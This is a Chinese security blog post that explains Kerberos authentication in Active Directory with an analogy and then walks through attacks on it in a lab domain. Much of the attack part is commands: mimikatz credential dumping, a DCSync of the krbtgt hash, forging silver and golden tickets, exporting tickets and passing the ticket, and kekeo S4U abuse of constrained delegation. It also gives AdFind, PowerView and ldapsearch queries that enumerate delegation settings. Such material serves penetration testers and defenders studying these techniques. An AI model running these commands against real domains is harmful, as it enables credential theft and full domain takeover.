<!DOCTYPE html>


<html lang="zh-Hans">


<head>
  <meta charset="utf-8" />
    
  <meta name="description" content="敢问路在何方" />
  
  <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1" />
  <title>
    kerberos浅析认证及攻击方法 |  回梦&#39;s Blog
  </title>
  <meta name="generator" content="hexo-theme-ayer">
  
  <link rel="shortcut icon" href="/favicon.ico" />
  
  
<link rel="stylesheet" href="/dist/main.css">

  <link rel="stylesheet" href="https://cdn.jsdelivr.net/gh/Shen-Yu/cdn/css/remixicon.min.css">
  
<link rel="stylesheet" href="/css/custom.css">

  
  <script src="https://cdn.jsdelivr.net/npm/pace-js@1.0.2/pace.min.js"></script>
  
  

  

</head>

</html>

<body>
  <div id="app">
    
      
    <main class="content on">
      <section class="outer">
  <article
  id="post-kerberos浅析认证及攻击方法"
  class="article article-type-post"
  itemscope
  itemprop="blogPost"
  data-scroll-reveal
>
  <div class="article-inner">
    
    <header class="article-header">
       
<h1 class="article-title sea-center" style="border-left:0" itemprop="name">
  kerberos浅析认证及攻击方法
</h1>
 

    </header>
     
    <div class="article-meta">
      <a href="/2021/01/25/kerberos%E6%B5%85%E6%9E%90%E8%AE%A4%E8%AF%81%E5%8F%8A%E6%94%BB%E5%87%BB%E6%96%B9%E6%B3%95/" class="article-date">
  <time datetime="2021-01-25T08:59:43.000Z" itemprop="datePublished">2021-01-25</time>
</a> 
  <div class="article-category">
    <a class="article-category-link" href="/categories/%E5%86%85%E7%BD%91%E6%B8%97%E9%80%8F/">内网渗透</a>
  </div>
  
<div class="word_count">
    <span class="post-time">
        <span class="post-meta-item-icon">
            <i class="ri-quill-pen-line"></i>
            <span class="post-meta-item-text"> Word count:</span>
            <span class="post-count">1.3k</span>
        </span>
    </span>

    <span class="post-time">
        &nbsp; | &nbsp;
        <span class="post-meta-item-icon">
            <i class="ri-book-open-line"></i>
            <span class="post-meta-item-text"> Reading time≈</span>
            <span class="post-count">5 min</span>
        </span>
    </span>
</div>
 
    </div>
      
    <div class="tocbot"></div>




  
    <div class="article-entry" itemprop="articleBody">
       
  <p><strong>不要为自己的失败找理由</strong></p>
<h1 id="Kerberos认证浅析"><a href="#Kerberos认证浅析" class="headerlink" title="Kerberos认证浅析"></a>Kerberos认证浅析</h1><h2 id="基础知识"><a href="#基础知识" class="headerlink" title="基础知识"></a>基础知识</h2><p>在Kerberos协议中主要有三个角色的存在：</p>
<p>1.访问服务的Client</p>
<p>2.提供服务的Server</p>
<p>3.KDC(Key Distribution Center)密钥分发中心<br>其中KDC分为Authentication Service(简称AS)，AS为Client生成TGT、Ticket Granting Service(简称TGS)，TGS为Client生成Ticket</p>
<p>AD类似于本机SAM的一个数据库，存储着Client的白名单，只有在这个名单中的Client才能够申请到TGT</p>
<p>TGT：可以理解为入场卷，通过入场卷可以获得票据</p>
<p>Tickket：票据，在域中使用</p>
<p>KDC服务默认安装域控中，从物理层面看，AD与KDC均为域控制器</p>
<p>KDC服务框架中包含一个krbtgt账户，是在创建域时系统自动创建的</p>
<h2 id="认证流程"><a href="#认证流程" class="headerlink" title="认证流程"></a>认证流程</h2><p>这个流程可以理解为：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">有一个富豪在他的别野弄了一场宴会，邀请了Client并发送了邀请函(宴会主人不知道Client长啥样)，并且宴会由主人亲自主持。那么Client要进入宴会找到富豪得到想要的东西，有下面几道程序：</span><br><span class="line">1.邀请函 --&gt; 白名单</span><br><span class="line">2.Client来到别野大门被保安(AS)拦住Client并询问他是否有邀请函(白名单)，Client亮出邀请函，保安立马拿富豪为Client准备的礼物(TGT)给他，这下Client让司机继续驶向富豪的别野</span><br><span class="line">3.富豪的管家(TGS)早早的在别野门口等候，当管家(TGS)看到Client手上拿着礼物(TGT)，即可上来进行问好并把别野的通行卡(Ticket)给了Clent</span><br><span class="line">4.拿到了通行卡(Ticket)的Client就可以在别野中畅通无阻并找到了富豪(Server)，得到了他想要的东西</span><br></pre></td></tr></table></figure>
<p><img src="/2021/01/25/kerberos%E6%B5%85%E6%9E%90%E8%AE%A4%E8%AF%81%E5%8F%8A%E6%94%BB%E5%87%BB%E6%96%B9%E6%B3%95/1.png"></p>
<h1 id="Kerberos攻击方法"><a href="#Kerberos攻击方法" class="headerlink" title="Kerberos攻击方法"></a>Kerberos攻击方法</h1><h2 id="白银票据"><a href="#白银票据" class="headerlink" title="白银票据"></a>白银票据</h2><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line">privilege::Debug，提升权限</span><br><span class="line">sekurlsa::logonpasswords，抓取密码</span><br><span class="line">kerberos::list，查看有没有票据，假如有需要进行清除</span><br><span class="line">kerberos::purge，清除票据</span><br><span class="line">kerberos::golden &#x2F;domain:&lt;域名&gt; &#x2F;sid:&lt;域 SID&gt; &#x2F;target:&lt;目标服务器主机名&gt; &#x2F;service:&lt;服务类型&gt; &#x2F;rc4:&lt;NTLM Hash&gt; &#x2F;user:&lt;用户名&gt; &#x2F;ptt</span><br><span class="line">&#x2F;sid:SID值</span><br><span class="line">&#x2F;target:目标服务器主机名</span><br><span class="line">&#x2F;service：需要指定相关的服务名，此处为cifs</span><br><span class="line">&#x2F;rc4：域控的计算机账号ntlm hash</span><br><span class="line">&#x2F;user:要伪造的用户名，任意填写</span><br></pre></td></tr></table></figure>
<p><img src="/2021/01/25/kerberos%E6%B5%85%E6%9E%90%E8%AE%A4%E8%AF%81%E5%8F%8A%E6%94%BB%E5%87%BB%E6%96%B9%E6%B3%95/4.png"></p>
<h2 id="黄金票据"><a href="#黄金票据" class="headerlink" title="黄金票据"></a>黄金票据</h2><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">lsadump::dcsync &#x2F;domain:域名 &#x2F;user:krbtgt</span><br><span class="line">#构造方法</span><br><span class="line">mimikatz.exe &quot;kerberos::golden &#x2F;domain:域名 &#x2F;sid:域sid &#x2F;rc4:krbtgt ntlm hash &#x2F;user:任意用户名 &#x2F;ptt&quot; exit</span><br><span class="line">sid不要复制后面的502</span><br><span class="line">#测试是否成功</span><br><span class="line">dir \\server2008.hello.com</span><br></pre></td></tr></table></figure>
<p><img src="/2021/01/25/kerberos%E6%B5%85%E6%9E%90%E8%AE%A4%E8%AF%81%E5%8F%8A%E6%94%BB%E5%87%BB%E6%96%B9%E6%B3%95/2.png"></p>
<p>可以使用PsExec进行执行命令</p>
<p><img src="/2021/01/25/kerberos%E6%B5%85%E6%9E%90%E8%AE%A4%E8%AF%81%E5%8F%8A%E6%94%BB%E5%87%BB%E6%96%B9%E6%B3%95/3.png"></p>
<p>工具下载地址</p>
<p><a target="_blank" rel="noopener" href="https://docs.microsoft.com/en-us/sysinternals/downloads/psexec">https://docs.microsoft.com/en-us/sysinternals/downloads/psexec</a></p>
<h2 id="金票与银票区别"><a href="#金票与银票区别" class="headerlink" title="金票与银票区别"></a>金票与银票区别</h2><h3 id="获取的权限不同"><a href="#获取的权限不同" class="headerlink" title="获取的权限不同"></a>获取的权限不同</h3><p>金票：伪造的TGT，可以获取任意Kerberos的访问权限<br>银票：伪造的ST，只能访问指定的服务，如CIFS</p>
<h3 id="认证流程不同"><a href="#认证流程不同" class="headerlink" title="认证流程不同"></a>认证流程不同</h3><p>金票：同KDC交互，但不同AS交互<br>银票：不同KDC交互，直接访问Server</p>
<h3 id="加密方式不同"><a href="#加密方式不同" class="headerlink" title="加密方式不同"></a>加密方式不同</h3><p>金票：由krbtgt NTLM Hash 加密<br>银票：由服务账号 NTLM Hash 加密</p>
<h2 id="非约束委派"><a href="#非约束委派" class="headerlink" title="非约束委派"></a>非约束委派</h2><h3 id="设置非约束委派"><a href="#设置非约束委派" class="headerlink" title="设置非约束委派"></a>设置非约束委派</h3><p><img src="/2021/01/25/kerberos%E6%B5%85%E6%9E%90%E8%AE%A4%E8%AF%81%E5%8F%8A%E6%94%BB%E5%87%BB%E6%96%B9%E6%B3%95/5.png"></p>
<p>设置完之后，要用administrator账户登录W2008，这里使用WinRM进行远程连接，默认端口为5985</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">Enter-PSSession -ComputerName W2008</span><br></pre></td></tr></table></figure>
<p>常见的连接方式还有：MSSQL和IIS</p>
<p>假如出现此错误</p>
<p><img src="/2021/01/25/kerberos%E6%B5%85%E6%9E%90%E8%AE%A4%E8%AF%81%E5%8F%8A%E6%94%BB%E5%87%BB%E6%96%B9%E6%B3%95/7.png"></p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">#域控运行，添加trusthost列表</span><br><span class="line">Set-item wsman:localhost\client\trustedhosts –value *</span><br><span class="line">#域主机运行</span><br><span class="line">Enable-PSremoting -force</span><br></pre></td></tr></table></figure>
<p><img src="/2021/01/25/kerberos%E6%B5%85%E6%9E%90%E8%AE%A4%E8%AF%81%E5%8F%8A%E6%94%BB%E5%87%BB%E6%96%B9%E6%B3%95/8.png"></p>
<h3 id="非约束委派查找"><a href="#非约束委派查找" class="headerlink" title="非约束委派查找"></a>非约束委派查找</h3><h4 id="ADfind"><a href="#ADfind" class="headerlink" title="ADfind"></a>ADfind</h4><p>工具地址：<a target="_blank" rel="noopener" href="http://www.joeware.net/freetools/tools/adfind/index.htm">http://www.joeware.net/freetools/tools/adfind/index.htm</a></p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">AdFind.exe -b &quot;DC&#x3D;hello,DC&#x3D;com&quot; -f &quot;(&amp;(samAccountType&#x3D;805306369)(userAccountControl:1.2.840.113556.1.4.803:&#x3D;524288))&quot; cn distinguishedName</span><br></pre></td></tr></table></figure>
<p><img src="/2021/01/25/kerberos%E6%B5%85%E6%9E%90%E8%AE%A4%E8%AF%81%E5%8F%8A%E6%94%BB%E5%87%BB%E6%96%B9%E6%B3%95/6.png"></p>
<h4 id="PowerView"><a href="#PowerView" class="headerlink" title="PowerView"></a>PowerView</h4><p>工具地址：<a target="_blank" rel="noopener" href="https://github.com/PowerShellMafia/PowerSploit/blob/master/Recon/PowerView.ps1">https://github.com/PowerShellMafia/PowerSploit/blob/master/Recon/PowerView.ps1</a></p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">Get-NetComputer -Unconstrained -Domain hello.com</span><br></pre></td></tr></table></figure>
<p><img src="/2021/01/25/kerberos%E6%B5%85%E6%9E%90%E8%AE%A4%E8%AF%81%E5%8F%8A%E6%94%BB%E5%87%BB%E6%96%B9%E6%B3%95/9.png"></p>
<h4 id="ldapsearch"><a href="#ldapsearch" class="headerlink" title="ldapsearch"></a>ldapsearch</h4><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">#kali自带</span><br><span class="line">ldapsearch -x -H ldap:&#x2F;&#x2F;192.168.213.148:389 -D &quot;CN&#x3D;hello,CN&#x3D;Users,DC&#x3D;hello,DC&#x3D;com&quot; -w password -b &quot;DC&#x3D;hello,DC&#x3D;com&quot; &quot;(&amp;(samAccountType&#x3D;805306369)(userAccountControl:1.2.840.113556.1.4.803:&#x3D;524288))&quot; |grep -iE &quot;distinguishedName&quot;</span><br></pre></td></tr></table></figure>


<h3 id="非约束委派利用"><a href="#非约束委派利用" class="headerlink" title="非约束委派利用"></a>非约束委派利用</h3><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">privilege::debug </span><br><span class="line">sekurlsa::tickets &#x2F;export</span><br></pre></td></tr></table></figure>
<p><img src="/2021/01/25/kerberos%E6%B5%85%E6%9E%90%E8%AE%A4%E8%AF%81%E5%8F%8A%E6%94%BB%E5%87%BB%E6%96%B9%E6%B3%95/10.png"></p>
<p>通过ptt将TGT注入到当前会话中</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">kerberos::ptt [0;76b92]-2-0-40e00000-Administrator@krbtgt-HELLO.COM.kirbi</span><br></pre></td></tr></table></figure>
<p><img src="/2021/01/25/kerberos%E6%B5%85%E6%9E%90%E8%AE%A4%E8%AF%81%E5%8F%8A%E6%94%BB%E5%87%BB%E6%96%B9%E6%B3%95/11.png"></p>
<h3 id="打印机Bug"><a href="#打印机Bug" class="headerlink" title="打印机Bug"></a>打印机Bug</h3><p>这个我懒得折腾了，08的.NET版本对不上</p>
<h2 id="约束委派"><a href="#约束委派" class="headerlink" title="约束委派"></a>约束委派</h2><h3 id="设置约束委派"><a href="#设置约束委派" class="headerlink" title="设置约束委派"></a>设置约束委派</h3><p><img src="/2021/01/25/kerberos%E6%B5%85%E6%9E%90%E8%AE%A4%E8%AF%81%E5%8F%8A%E6%94%BB%E5%87%BB%E6%96%B9%E6%B3%95/12.png"></p>
<h3 id="约束委派查找"><a href="#约束委派查找" class="headerlink" title="约束委派查找"></a>约束委派查找</h3><h4 id="ADfind-1"><a href="#ADfind-1" class="headerlink" title="ADfind"></a>ADfind</h4><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">AdFind.exe -b <span class="string">&quot;DC=hello,DC=com&quot;</span> -f <span class="string">&quot;(&amp;(samAccountType=805306369)(msds-allowedtodelegateto=*))&quot;</span> cn distinguishedName msds-allowedtodelegateto</span><br></pre></td></tr></table></figure>
<p><img src="/2021/01/25/kerberos%E6%B5%85%E6%9E%90%E8%AE%A4%E8%AF%81%E5%8F%8A%E6%94%BB%E5%87%BB%E6%96%B9%E6%B3%95/13.png"></p>
<h4 id="PowerView-1"><a href="#PowerView-1" class="headerlink" title="PowerView"></a>PowerView</h4><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">Get-DomainComputer -TrustedToAuth -Domain hello.com -Properties distinguishedname,useraccountcontrol,msds-allowedtodelegateto|ft -Wrap -AutoSize</span><br></pre></td></tr></table></figure>
<h3 id="约束委派利用"><a href="#约束委派利用" class="headerlink" title="约束委派利用"></a>约束委派利用</h3><p>利用条件：指定服务用户明文</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">tgt::ask &#x2F;user:DM &#x2F;domain:hello.com &#x2F;password:abcd0123** &#x2F;ticket:test.kirb</span><br></pre></td></tr></table></figure>
<p>获得：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">TGT_DM@HELLO.COM_krbtgt~hello.com@HELLO.COM.kirbi</span><br><span class="line">#将其改名为2.kirbi</span><br><span class="line">#使用这张TGT通过伪造s4u请求以administrator用户身份请求访问AD CIFS的ST</span><br><span class="line">tgs::s4u &#x2F;tgt:2.kirbi &#x2F;user:Administrator@hello.com &#x2F;service:cifs&#x2F;AD.hello.com</span><br><span class="line">#使用mimikatz将ST2导入当前会话</span><br><span class="line">kerberos::ptt TGS_Administrator@hello.com@HELLO.COM_cifs~AD.hello.com@HELLO.COM.kirbi</span><br><span class="line">#导入之后即可访问AD的cifs服务，kekeo同样支持使用NTLM Hash</span><br></pre></td></tr></table></figure>


<h1 id="参考文章"><a href="#参考文章" class="headerlink" title="参考文章"></a>参考文章</h1><p><a target="_blank" rel="noopener" href="https://www.jianshu.com/p/4936da524040">https://www.jianshu.com/p/4936da524040</a></p>
<p><a target="_blank" rel="noopener" href="https://xz.aliyun.com/t/7217">https://xz.aliyun.com/t/7217</a></p>
 
      <!-- reward -->
      
    </div>
    

    <!-- copyright -->
    
    <div class="declare">
      <ul class="post-copyright">
        <li>
          <i class="ri-copyright-line"></i>
          <strong>Copyright： </strong>
          
          Copyright is owned by the author. For commercial reprints, please contact the author for authorization. For non-commercial reprints, please indicate the source.
          
        </li>
      </ul>
    </div>
    
    <footer class="article-footer">
       
<div class="share-btn">
      <span class="share-sns share-outer">
        <i class="ri-share-forward-line"></i>
        分享
      </span>
      <div class="share-wrap">
        <i class="arrow"></i>
        <div class="share-icons">
          
          <a class="weibo share-sns" href="javascript:;" data-type="weibo">
            <i class="ri-weibo-fill"></i>
          </a>
          <a class="weixin share-sns wxFab" href="javascript:;" data-type="weixin">
            <i class="ri-wechat-fill"></i>
          </a>
          <a class="qq share-sns" href="javascript:;" data-type="qq">
            <i class="ri-qq-fill"></i>
          </a>
          <a class="douban share-sns" href="javascript:;" data-type="douban">
            <i class="ri-douban-line"></i>
          </a>
          <!-- <a class="qzone share-sns" href="javascript:;" data-type="qzone">
            <i class="icon icon-qzone"></i>
          </a> -->
          
          <a class="facebook share-sns" href="javascript:;" data-type="facebook">
            <i class="ri-facebook-circle-fill"></i>
          </a>
          <a class="twitter share-sns" href="javascript:;" data-type="twitter">
            <i class="ri-twitter-fill"></i>
          </a>
          <a class="google share-sns" href="javascript:;" data-type="google">
            <i class="ri-google-fill"></i>
          </a>
        </div>
      </div>
</div>

<div class="wx-share-modal">
    <a class="modal-close" href="javascript:;"><i class="ri-close-circle-line"></i></a>
    <p>扫一扫，分享到微信</p>
    <div class="wx-qrcode">
      <img src="//api.qrserver.com/v1/create-qr-code/?size=150x150&data=http://example.com/2021/01/25/kerberos%E6%B5%85%E6%9E%90%E8%AE%A4%E8%AF%81%E5%8F%8A%E6%94%BB%E5%87%BB%E6%96%B9%E6%B3%95/" alt="微信分享二维码">
    </div>
</div>

<div id="share-mask"></div>  
  <ul class="article-tag-list" itemprop="keywords"><li class="article-tag-list-item"><a class="article-tag-list-link" href="/tags/%E5%86%85%E7%BD%91%E6%B8%97%E9%80%8F/" rel="tag">内网渗透</a></li></ul>

    </footer>
  </div>

   
  <nav class="article-nav">
    
      <a href="/2021/03/03/%E8%AE%B0EDUSEC%E6%8C%96%E6%8E%98%E6%96%B9%E6%B3%95/" class="article-nav-link">
        <strong class="article-nav-caption">上一篇</strong>
        <div class="article-nav-title">
          
            记EDUSEC挖掘方法
          
        </div>
      </a>
    
    
      <a href="/2021/01/22/%E8%87%B4%E8%BF%9COA-ajax-do%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0%E6%BC%8F%E6%B4%9E/" class="article-nav-link">
        <strong class="article-nav-caption">下一篇</strong>
        <div class="article-nav-title">致远OA-ajax.do任意文件上传漏洞</div>
      </a>
    
  </nav>

   
<!-- valine评论 -->
<div id="vcomments-box">
  <div id="vcomments"></div>
</div>
<script src="//cdn1.lncld.net/static/js/3.0.4/av-min.js"></script>
<script src="https://cdn.jsdelivr.net/npm/valine@1.4.14/dist/Valine.min.js"></script>
<script>
  new Valine({
    el: "#vcomments",
    app_id: "",
    app_key: "",
    path: window.location.pathname,
    avatar: "monsterid",
    placeholder: "给我的文章加点评论吧~",
    recordIP: true,
  });
  const infoEle = document.querySelector("#vcomments .info");
  if (infoEle && infoEle.childNodes && infoEle.childNodes.length > 0) {
    infoEle.childNodes.forEach(function (item) {
      item.parentNode.removeChild(item);
    });
  }
</script>
<style>
  #vcomments-box {
    padding: 5px 30px;
  }

  @media screen and (max-width: 800px) {
    #vcomments-box {
      padding: 5px 0px;
    }
  }

  #vcomments-box #vcomments {
    background-color: #fff;
  }

  .v .vlist .vcard .vh {
    padding-right: 20px;
  }

  .v .vlist .vcard {
    padding-left: 10px;
  }
</style>

 
   
     
</article>

</section>
      <footer class="footer">
  <div class="outer">
    <ul>
      <li>
        Copyrights &copy;
        2020-2021
        <i class="ri-heart-fill heart_icon"></i> John Doe
      </li>
    </ul>
    <ul>
      <li>
        
      </li>
    </ul>
    <ul>
      <li>
        
        
        <span>
  <span><i class="ri-user-3-fill"></i>Visitors:<span id="busuanzi_value_site_uv"></span></s>
  <span class="division">|</span>
  <span><i class="ri-eye-fill"></i>Views:<span id="busuanzi_value_page_pv"></span></span>
</span>
        
      </li>
    </ul>
    <ul>
      
    </ul>
    <ul>
      
    </ul>
    <ul>
      <li>
        <!-- cnzz统计 -->
        
      </li>
    </ul>
  </div>
</footer>
      <div class="float_btns">
        <div class="totop" id="totop">
  <i class="ri-arrow-up-line"></i>
</div>

<div class="todark" id="todark">
  <i class="ri-moon-line"></i>
</div>

      </div>
    </main>
    <aside class="sidebar on">
      <button class="navbar-toggle"></button>
<nav class="navbar">
  
  <div class="logo">
    <a href="/"><img src="/images/logo.png" alt="回梦&#39;s Blog"></a>
  </div>
  
  <ul class="nav nav-main">
    
    <li class="nav-item">
      <a class="nav-item-link" href="/">主页</a>
    </li>
    
    <li class="nav-item">
      <a class="nav-item-link" href="/archives">归档</a>
    </li>
    
    <li class="nav-item">
      <a class="nav-item-link" href="/tags">标签</a>
    </li>
    
    <li class="nav-item">
      <a class="nav-item-link" href="/friends">友链</a>
    </li>
    
    <li class="nav-item">
      <a class="nav-item-link" href="/about">关于我</a>
    </li>
    
  </ul>
</nav>
<nav class="navbar navbar-bottom">
  <ul class="nav">
    <li class="nav-item">
      
      <a class="nav-item-link nav-item-search"  title="Search">
        <i class="ri-search-line"></i>
      </a>
      
      
      <a class="nav-item-link" target="_blank" href="/atom.xml" title="RSS Feed">
        <i class="ri-rss-line"></i>
      </a>
      
    </li>
  </ul>
</nav>
<div class="search-form-wrap">
  <div class="local-search local-search-plugin">
  <input type="search" id="local-search-input" class="local-search-input" placeholder="Search...">
  <div id="local-search-result" class="local-search-result"></div>
</div>
</div>
    </aside>
    <script>
      if (window.matchMedia("(max-width: 768px)").matches) {
        document.querySelector('.content').classList.remove('on');
        document.querySelector('.sidebar').classList.remove('on');
      }
    </script>
    <div id="mask"></div>

<!-- #reward -->
<div id="reward">
  <span class="close"><i class="ri-close-line"></i></span>
  <p class="reward-p"><i class="ri-cup-line"></i>请我喝杯咖啡吧~</p>
  <div class="reward-box">
    
    <div class="reward-item">
      <img class="reward-img" src="https://cdn.jsdelivr.net/gh/Shen-Yu/cdn/img/alipay.jpg">
      <span class="reward-type">支付宝</span>
    </div>
    
    
    <div class="reward-item">
      <img class="reward-img" src="https://cdn.jsdelivr.net/gh/Shen-Yu/cdn/img/wechat.jpg">
      <span class="reward-type">微信</span>
    </div>
    
  </div>
</div>
    
<script src="/js/jquery-2.0.3.min.js"></script>


<script src="/js/lazyload.min.js"></script>

<!-- Tocbot -->


<script src="/js/tocbot.min.js"></script>

<script>
  tocbot.init({
    tocSelector: '.tocbot',
    contentSelector: '.article-entry',
    headingSelector: 'h1, h2, h3, h4, h5, h6',
    hasInnerContainers: true,
    scrollSmooth: true,
    scrollContainer: 'main',
    positionFixedSelector: '.tocbot',
    positionFixedClass: 'is-position-fixed',
    fixedSidebarOffset: 'auto'
  });
</script>

<script src="https://cdn.jsdelivr.net/npm/jquery-modal@0.9.2/jquery.modal.min.js"></script>
<link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/jquery-modal@0.9.2/jquery.modal.min.css">
<script src="https://cdn.jsdelivr.net/npm/justifiedGallery@3.7.0/dist/js/jquery.justifiedGallery.min.js"></script>

<script src="/dist/main.js"></script>

<!-- ImageViewer -->

<!-- Root element of PhotoSwipe. Must have class pswp. -->
<div class="pswp" tabindex="-1" role="dialog" aria-hidden="true">

    <!-- Background of PhotoSwipe. 
         It's a separate element as animating opacity is faster than rgba(). -->
    <div class="pswp__bg"></div>

    <!-- Slides wrapper with overflow:hidden. -->
    <div class="pswp__scroll-wrap">

        <!-- Container that holds slides. 
            PhotoSwipe keeps only 3 of them in the DOM to save memory.
            Don't modify these 3 pswp__item elements, data is added later on. -->
        <div class="pswp__container">
            <div class="pswp__item"></div>
            <div class="pswp__item"></div>
            <div class="pswp__item"></div>
        </div>

        <!-- Default (PhotoSwipeUI_Default) interface on top of sliding area. Can be changed. -->
        <div class="pswp__ui pswp__ui--hidden">

            <div class="pswp__top-bar">

                <!--  Controls are self-explanatory. Order can be changed. -->

                <div class="pswp__counter"></div>

                <button class="pswp__button pswp__button--close" title="Close (Esc)"></button>

                <button class="pswp__button pswp__button--share" style="display:none" title="Share"></button>

                <button class="pswp__button pswp__button--fs" title="Toggle fullscreen"></button>

                <button class="pswp__button pswp__button--zoom" title="Zoom in/out"></button>

                <!-- Preloader demo http://codepen.io/dimsemenov/pen/yyBWoR -->
                <!-- element will get class pswp__preloader--active when preloader is running -->
                <div class="pswp__preloader">
                    <div class="pswp__preloader__icn">
                        <div class="pswp__preloader__cut">
                            <div class="pswp__preloader__donut"></div>
                        </div>
                    </div>
                </div>
            </div>

            <div class="pswp__share-modal pswp__share-modal--hidden pswp__single-tap">
                <div class="pswp__share-tooltip"></div>
            </div>

            <button class="pswp__button pswp__button--arrow--left" title="Previous (arrow left)">
            </button>

            <button class="pswp__button pswp__button--arrow--right" title="Next (arrow right)">
            </button>

            <div class="pswp__caption">
                <div class="pswp__caption__center"></div>
            </div>

        </div>

    </div>

</div>

<link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/photoswipe@4.1.3/dist/photoswipe.min.css">
<link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/photoswipe@4.1.3/dist/default-skin/default-skin.min.css">
<script src="https://cdn.jsdelivr.net/npm/photoswipe@4.1.3/dist/photoswipe.min.js"></script>
<script src="https://cdn.jsdelivr.net/npm/photoswipe@4.1.3/dist/photoswipe-ui-default.min.js"></script>

<script>
    function viewer_init() {
        let pswpElement = document.querySelectorAll('.pswp')[0];
        let $imgArr = document.querySelectorAll(('.article-entry img:not(.reward-img)'))

        $imgArr.forEach(($em, i) => {
            $em.onclick = () => {
                // slider展开状态
                // todo: 这样不好，后面改成状态
                if (document.querySelector('.left-col.show')) return
                let items = []
                $imgArr.forEach(($em2, i2) => {
                    let img = $em2.getAttribute('data-idx', i2)
                    let src = $em2.getAttribute('data-target') || $em2.getAttribute('src')
                    let title = $em2.getAttribute('alt')
                    // 获得原图尺寸
                    const image = new Image()
                    image.src = src
                    items.push({
                        src: src,
                        w: image.width || $em2.width,
                        h: image.height || $em2.height,
                        title: title
                    })
                })
                var gallery = new PhotoSwipe(pswpElement, PhotoSwipeUI_Default, items, {
                    index: parseInt(i)
                });
                gallery.init()
            }
        })
    }
    viewer_init()
</script>

<!-- MathJax -->

<!-- Katex -->

<!-- busuanzi  -->


<script src="/js/busuanzi-2.3.pure.min.js"></script>


<!-- ClickLove -->

<!-- ClickBoom1 -->

<!-- ClickBoom2 -->

<!-- CodeCopy -->


<link rel="stylesheet" href="/css/clipboard.css">

<script src="https://cdn.jsdelivr.net/npm/clipboard@2/dist/clipboard.min.js"></script>
<script>
  function wait(callback, seconds) {
    var timelag = null;
    timelag = window.setTimeout(callback, seconds);
  }
  !function (e, t, a) {
    var initCopyCode = function(){
      var copyHtml = '';
      copyHtml += '<button class="btn-copy" data-clipboard-snippet="">';
      copyHtml += '<i class="ri-file-copy-2-line"></i><span>COPY</span>';
      copyHtml += '</button>';
      $(".highlight .code pre").before(copyHtml);
      $(".article pre code").before(copyHtml);
      var clipboard = new ClipboardJS('.btn-copy', {
        target: function(trigger) {
          return trigger.nextElementSibling;
        }
      });
      clipboard.on('success', function(e) {
        let $btn = $(e.trigger);
        $btn.addClass('copied');
        let $icon = $($btn.find('i'));
        $icon.removeClass('ri-file-copy-2-line');
        $icon.addClass('ri-checkbox-circle-line');
        let $span = $($btn.find('span'));
        $span[0].innerText = 'COPIED';
        
        wait(function () { // 等待两秒钟后恢复
          $icon.removeClass('ri-checkbox-circle-line');
          $icon.addClass('ri-file-copy-2-line');
          $span[0].innerText = 'COPY';
        }, 2000);
      });
      clipboard.on('error', function(e) {
        e.clearSelection();
        let $btn = $(e.trigger);
        $btn.addClass('copy-failed');
        let $icon = $($btn.find('i'));
        $icon.removeClass('ri-file-copy-2-line');
        $icon.addClass('ri-time-line');
        let $span = $($btn.find('span'));
        $span[0].innerText = 'COPY FAILED';
        
        wait(function () { // 等待两秒钟后恢复
          $icon.removeClass('ri-time-line');
          $icon.addClass('ri-file-copy-2-line');
          $span[0].innerText = 'COPY';
        }, 2000);
      });
    }
    initCopyCode();
  }(window, document);
</script>


<!-- CanvasBackground -->


    
  </div>
</body>

</html>